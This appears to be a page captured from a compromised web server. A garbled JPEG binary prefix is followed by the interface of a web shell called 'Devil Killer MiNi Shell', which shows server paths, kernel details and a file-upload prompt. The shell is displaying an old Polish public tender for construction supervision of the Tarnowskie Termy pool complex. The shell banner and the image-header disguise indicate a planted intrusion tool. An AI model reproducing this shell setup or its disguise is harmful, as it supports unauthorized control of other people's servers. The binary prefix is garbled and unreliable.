JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130128/37448-N-2013.html

<p class="kh_header"><b>Tarnowo Podgórne: Pełnienie kompleksowego nadzoru inwestorskiego wraz z obsługą inwestycji 
pod nazwą budowa obiektu Tarnowskie Termy</b><br>
<b>Numer ogłoszenia: 37448 - 2013; data zamieszczenia: 28.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tarnowskie Termy Sp. z o.o. w organizacji , ul. Poznańska 115, 62-080 Tarnowo Podgórne, woj. wielkopolskie, tel. 61 8164705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnowskie-termy.pl; www.tarnowo-podgorne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego wraz z obsługą inwestycji 
pod nazwą budowa obiektu Tarnowskie Termy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie kompleksowego nadzoru inwestorskiego nad realizacją zadania inwestycyjnego pod nazwą budowa Tarnowskich Term w Tarnowie Podgórnym.
Zakres przedmiotu zamówienia obejmuje: 
1)	analizę prawidłowości wykonania dokumentacji projektowej, weryfikację projektów budowlanych w zakresie zgodności z ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. 2010r. Nr 243, poz. 1623 z późn. zm.), polskimi normami, zasadami wiedzy technicznej;
2)	dokonanie w imieniu Zamawiającego zgłoszenia o rozpoczęciu robót budowlanych do właściwego organu nadzoru budowlanego oraz pozostałych instytucji związanych z realizacją procesu budowlanego; 
3)	ustanowienie inspektorów nadzoru we wszystkich branżach występujących w inwestycji oraz inspektora koordynatora zgodnie z przyjętą ofertą oraz zgodnie z art. 27 ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. 2010r. Nr 243, poz. 1623 z późn. zm.);
4)	egzekwowanie w imieniu Zamawiającego wszelkich postanowień umowy, SIWZ oraz wszelkich uzgodnień z Generalnym Wykonawcą (zwanego dalej GW);
5)	wyegzekwowanie od GW, wymaganych przez Zamawiającego, ubezpieczeń z tytułu szkód oraz od odpowiedzialności cywilnej;
6)	wyegzekwowanie od GW przypisanych mu obowiązków wobec podwykonawców w zakresie koordynacji, bezpieczeństwa, ochrony informacji niejawnych o ile będą mieli dostęp do tych informacji;
7)	kontrolowanie jakości i terminowości wykonywania robót i zgodności przebiegu procesu budowlanego z obowiązującym harmonogramem budowy oraz przygotowanie i przedstawienie Zamawiającemu comiesięcznych pisemnych sprawozdań z postępu robót i realizacji planowanych nakładów finansowych; dostarczenie sprawozdań w formie pisemnej (do siedziby Zamawiającego) i elektronicznej (na adres: biuro@tarnowskie-termy.pl, a.stellmaszyk@tarnowskie-termy.pl); 
8)	wyegzekwowania od GW bieżącego utrzymania czystości dróg dojazdowych do terenu budowy oraz przyległego terenu zaplecza budowy;
9)	wyegzekwowanie od Projektanta pełnienia obowiązków nadzoru autorskiego;
10)	wyegzekwowanie od GW prawidłowej obsługi geodezyjnej;
11)	realizacja postulatów Zamawiającego odnośnie materiałów, urządzeń, poprawek w trakcie realizacji inwestycji;
12)	kontrola harmonogramu wynikającego z umowy Zamawiającego z GW pod kątem monitorowania jakichkolwiek zmian w kolejności wykonywania robót, kontrola terminów rozpoczęcia i zakończenia poszczególnych etapów prac i zakończenia inwestycji;
13)	kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny prawidłowego wykonania robót;
14)	sprawdzanie przedstawionych przez GW obmiarów wykonanych robót. Sprawdzenia należy dokonać w ciągu 5 dni roboczych od daty otrzymania obmiarów od GW;
15)	reprezentowanie Zamawiającego na budowie poprzez sprawowanie na bieżąco kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, zawartą umową z GW, przepisami i obowiązującymi normami oraz zasadami wiedzy technicznej;
16)	sprawdzanie jakości wykonanych robót, wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie oraz w sposób niezgodny z ich przeznaczeniem;
17)	protokolarne potwierdzanie faktycznie wykonanych robót oraz usuniętych wad;
18)	opiniowanie wniosków GW w sprawie akceptacji oraz zmiany materiałów i urządzeń, przebiegu tras instalacji wewnętrznych i zewnętrznych. Uzgodnienie proponowanych zmian z Projektantem i przedstawianie zaopiniowanych wniosków do akceptacji Zamawiającemu;
19)	udzielanie pisemnej odpowiedzi w terminie do 2 dni na każdy wpis do dziennika budowy;
20)	ponadto inspektor/ inspektorzy nadzoru budowlanego ma/mają prawo:
a)	wydawać kierownikowi budowy lub kierownikowi robót polecenie potwierdzone wpisem do dziennika budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń; wykonania prób, badań, także wymagających odkrycia elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych; dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych,
b)	żądać od kierowników budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę;
21)	stałą obecność na terenie budowy Inspektora Koordynatora lub inspektora go zastępującego a w czasie wykonywania robót w zakresie poszczególnych branż, również inspektorów branżowych;
22)	przybycie na każde uzasadnione wezwanie (pisemne, telefoniczne, mailowe) Zamawiającego i wykonawcy robót objętych nadzorem;
23)	obowiązek kontrolowania prawidłowości wykonywanych robót zgodnie z terminami określonymi przez Zamawiającego i odnotowanie każdorazowo tego faktu w dzienniku budowy;
24)	informowanie Zamawiającego o sytuacjach mogących spowodować opóźnienie robót w stosunku do przyjętego harmonogramu;
25)	organizowanie testów jakości, prób szczelności przez specjalistyczne podmioty, na polecenie Zamawiającego;
26)	rozstrzyganie w porozumieniu z kierownikiem budowy oraz Zamawiającym wątpliwości natury technicznej, powstałych w trakcie realizacji robót, zasięgając opinii autora projektu bądź niezależnych rzeczoznawców;
27)	projektowanie korespondencji Zamawiającego związanej z realizacją inwestycji oraz analiza korespondencji od GW oraz innych uczestników procesu inwestycyjnego, poprzez przedstawienie Zamawiającemu propozycji stanowiska;
28)	prowadzenie dokumentacji fotograficznej (metodą cyfrową) dla robót zanikających lub ulegających zakryciu; przedmiotowa dokumentacja winna być załączona do każdego protokołu odbioru robót;
29)	dokonywanie inwentaryzacji robót, w sytuacji, gdy zachodzi potrzeba ustalenia ilości, jakości i wartości robót w zakresie niezbędnym do rozliczenia z Zamawiającym (zgodnie z harmonogramem);
30)	ewidencjonowanie kosztów inwestycji i ich rozliczenie z Zamawiającym w okresach zgodnych z harmonogramem;
31)	ustalanie zakresu robót nieprzewidzianych w umowie z GW, opracowanie protokołów konieczności wraz z uzasadnieniem w celu uzyskania akceptacji przez Zamawiającego;
32)	pisemne powiadamianie Zamawiającego o planowanych odbiorach:
a)	robót zanikających i ulegających zakryciu - z wyprzedzeniem 24 godzin,
b)	robót częściowych - z wyprzedzeniem 3 dni roboczych,
c)	końcowym - z wyprzedzeniem co najmniej 5 dni roboczych,
d)	gwarancyjnych - z wyprzedzeniem przynajmniej 5 dni roboczych;
33)	przeprowadzenie odbiorów robót zanikających i ulegających zakryciu, odbiorów częściowych, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych; przy udziale instytucji odbierających;
34)	koordynowanie odbiorów wykonanych robót z uwzględnieniem odbioru dokumentacji powykonawczej, świadectw, atestów, instrukcji obsługi urządzeń, oraz innych dokumentów odbiorowych oraz sprawdzenie i pisemna akceptacja ich kompletności;
35)	organizowanie i dokonywanie odbiorów końcowego i gwarancyjnego przy udziale Zamawiającego;
36)	sporządzanie protokołów z przeprowadzonych odbiorów;
37)	uczestnictwo przy testowaniu poszczególnych systemów instalacyjnych w celu sprawdzenia zgodności ich wykonania z dokumentacją techniczną;
38)	obowiązek udziału w naradach zgodnie z terminami określonymi przez Zamawiającego, sporządzanie protokołów ze spotkań i przedstawianie ich Zamawiającemu w terminie do 5 dni od daty przeprowadzenia spotkania;
39)	nadzór nad przestrzeganiem przepisów ppoż., bezpieczeństwa i higieny pracy, przepisów z zakresu ochrony środowiska przez wszystkich uczestników procesu inwestycyjnego;
40)	nadzór nad całością prac wykończeniowych prowadzonych przez najemców w pomieszczeniach przeznaczonych pod najem;
41)	odbiór pomieszczeń przeznaczonych pod najem przed przystąpieniem do ich użytkowania;
42)	wyegzekwowanie od GW dokumentacji powykonawczej i DTR oraz kompletu niezbędnych dokumentów do przeprowadzenia odbioru końcowego i zgłoszenia do pozwolenia na użytkowanie;
43)	uczestniczenie w imieniu Zamawiającego w postępowaniu mającym na celu uzyskanie ostatecznego pozwolenia na użytkowanie;
44)	przejęcie od kierownika budowy dziennika budowy i przekazanie go Zamawiającemu;
45)	występowanie przed sądami w sprawach dotyczących zobowiązań umownych uczestników procesu;
46)	występowanie w imieniu Zamawiającego przed organami administracji w zakresie przedmiotowym, związanym z realizacją inwestycji;
47)	opiniowanie projektów aneksów do umowy z GW i ich parafowanie;
48)	udział w rozruchu inwestycji, sporządzenie protokołu z rozruchu oraz weryfikacja sprawności funkcjonowania wykonanych instalacji urządzeń, maszyn i obiektów będących przedmiotem inwestycji oraz osiągnięcia wymaganych parametrów technicznych;
49)	przeprowadzenie przeglądów pogwarancyjnych, w tym organizowanie i kontrolowanie usuwania przez GW usterek w ramach realizacji uprawnień Zamawiającego wynikających z rękojmi i gwarancji;
50)	realizacja uprawnień Zamawiającego z tytułu rękojmi i gwarancji, w razie stwierdzenia wad nienadających się do usunięcia, ustalenia zasady oraz wysokości kwoty, o jaką cena ryczałtowa winna ulec obniżeniu (w porozumieniu z Zamawiającym);
51)	nadzór nad pracami GW związanymi z usuwaniem wad i usterek;
a)	sporządzeniu protokołu ewentualnych usterek,
b)	wezwaniu do usunięcia usterek
c)	sporządzeniu protokołu usunięcia wad i usterek.
52)	kontrola kosztów inwestycji:
a)	analiza wraz z potwierdzeniem zasadności wystawionych faktur przez GW, sprawdzanie dokumentów rozliczeniowych pod względem merytorycznym i rachunkowym,
b)	analiza jakości i cen materiałów oraz urządzeń,
c)	kontrola prawidłowości wystawionych faktur w zakresie przesłanek ich wystawienia, zakresu i kwoty na zasadach określonych w umowie, w terminie 7 dni,
d)	wyliczanie (w porozumieniu z Zamawiającym) wysokości kar umownych dla GW wraz z uzasadnieniem oraz przekazywanie Zamawiającemu w celu ich wyegzekwowania,
e)	ustalanie podstaw i wysokości obniżenia należności GW z tyt. obniżenia jakości robót,
f)	wykonanie rozliczeń końcowych przy udziale Zamawiającego;
53) wszystkie pozostałe czynności związane z prawidłowym wykonaniem inwestycji w zakresie pełnienia funkcji inspektora nadzoru, zgodnie z obowiązującymi przepisami.
Wykonawca bez zgody Zamawiającego nie jest upoważniony do wydawania poleceń wykonania robót dodatkowych, z wyjątkiem przypadku zagrożenia bezpieczeństwa ludzi, mienia lub zagrożenia środowiska.

Materiały i urządzenia:
1. Wykonawca zobowiązany jest na bieżąco sprawdzać jakość robót, z jakością i standardami odpowiadającymi wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, jak również zgodnymi z wymaganiami Zamawiającego określonymi w specyfikacji istotnych warunków zamówienia, a w szczególności zapobiegać zastosowaniu przez GW wyrobów i materiałów budowlanych wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie. 
2. Wykonawca, na każde żądanie Zamawiającego, zobowiązany jest wyegzekwować od kierownika budowy i przekazać Zamawiającemu certyfikat na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną odnośnie zaoferowanych i użytych materiałów. Wykonawca zobowiązuje się dołączyć wskazane wyżej dokumenty do protokołu odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt. 6 Prawa zamówień publicznych do 20% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę polegającą na pełnieniu pełnobranżowego nadzoru inwestorskiego nad realizacją obiektu budowlanego - kubaturowego typu kryty basen sportowo - rekreacyjny z funkcjami towarzyszącymi (np. fitness, sauna) o wartości co najmniej 15 000 000 zł brutto,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
c.1. osobami posiadającymi uprawnienia do nadzorowania robót budowlanych o specjalności uprawnień konstrukcyjno - budowlanych: 2 osoby z min. 5-letnim doświadczeniem zawodowym w nadzorowaniu robót budowlanych obejmujących obiekty kubaturowe, w tym co najmniej jedna osoba musi posiadać doświadczenie nad realizacją obiektu budowlanego - kubaturowego typu kryty basen sportowo - rekreacyjny z funkcjami towarzyszącymi (np. fitness, sauna) o wartości co najmniej 15 000 000 zł brutto,
c.2. osobami posiadającymi uprawnienia do nadzorowania robót budowlanych o specjalności uprawnień instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - 2 osoby, w tym co najmniej jedna osoba z minimum 5 letnim doświadczeniem w nadzorowaniu robót instalacyjnych, związanych realizacją obiektu budowlanego - kubaturowego typu kryty basen sportowo - rekreacyjny z funkcjami towarzyszącymi (np. fitness, sauna) o wartości co najmniej 15 000 000 zł brutto,
c.3. osobą posiadającą uprawnienia do nadzorowania robót budowlanych o specjalności uprawnień instalacyjnej w zakresie instalacji i urządzeń elektrycznych - 1 osoba z minimum 5-letnim doświadczeniem w nadzorowaniu robót elektrycznych, związanych z  realizacją obiektu budowlanego - kubaturowego typu kryty basen sportowo - rekreacyjny z funkcjami towarzyszącymi (np. fitness, sauna) o wartości co najmniej 15 000 000 zł brutto,
c.4.	osobą posiadającą uprawnienia do nadzorowania robót budowlanych o specjalności uprawnień drogowych - co najmniej 1 osoba z 5-letnim doświadczeniem w nadzorowaniu robotami drogowymi,
c.5. osobą, która jest specjalistą w branży automatyki kontrolno - pomiarowej i posiada: 
-	wykształcenie w specjalności elektryk, elektronik lub automatyk;
-	co najmniej 5-letnie doświadczenie zawodowe w zakresie montażu, rozruchu i eksploatacji w dziedzinie systemów kontrolno - pomiarowych i automatyki.
c.6. osobą, która jest specjalistą w branży teletechnicznej i posiada: 
-	wykształcenie w specjalności informatycznej, lub telekomunikacyjnej;
-	co najmniej 5-letnie doświadczenie zawodowe w zakresie budowy lub nadzoru sieci teleinformatycznej i alarmowej
Zamawiający dopuszcza łączenie stanowisk wymienionych w ppkt c) lit. Od c.2. do c.7 tylko pod warunkiem spełnienia łącznie wymagań dotyczących kwalifikacji i doświadczenia dla danych stanowisk. Zespół inspektorów powinien liczyć nie mniej niż 5 osób, w tym jeden z inspektorów pełniący funkcję Inspektora Koordynatora (o specjalności uprawnień konstrukcyjno-budowlanych).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest posiadanie ubezpieczenia odpowiedzialności cywilnej od prowadzonej działalności gospodarczej w zakresie przedmiotu zamówienia na kwotę nie mniejszą niż 400 000 zł.,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umownego terminu zakończenia przedmiotu jest możliwa w następujących przypadkach:
	1) wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego lub GW;
	2) działania siły wyższej;
3) wydłużenia terminu umowy z generalnym wykonawcą, fakt ten winien zostać potwierdzony wpisem do dziennika budowy. 

- W przypadku wystąpienia przyczyn, o których mowa powyżej Strony uzgodnią zmiany terminu umownego wykonania robót budowlanych nadzorowanych w formie aneksu.
Zmiany umowy w formie aneksu do umowy są również możliwe w przypadkach, w których nastąpiły:
- zmiana urzędowej stawki podatku VAT. W przypadku urzędowej zmiany stawki podatku VAT w trakcie realizacji Umowy - podatek VAT będzie naliczany w wartościach wynikających z przepisów obowiązujących w dniu wystawienia faktury z jednoczesnym dokonaniem przez strony inwentaryzacji robót według stanu na dzień poprzedzający wystawienie faktury po wejściu w życie zmienionych przepisów. Finansowe konsekwencje zmiany stawki podatku VAT w trakcie realizacji umowy strony ponoszą solidarnie - w równych częściach,
- zmiana podwykonawcy za aprobatą Zamawiającego,
- zmiana inspektorów nadzoru, Inspektora Koordynatora, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane lub innych ustawach, jeżeli świadczenie usługi przez daną osobę nie jest możliwe z przyczyn określonych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnowskie-termy.pl; www.tarnowo-podgorne.pl<br>
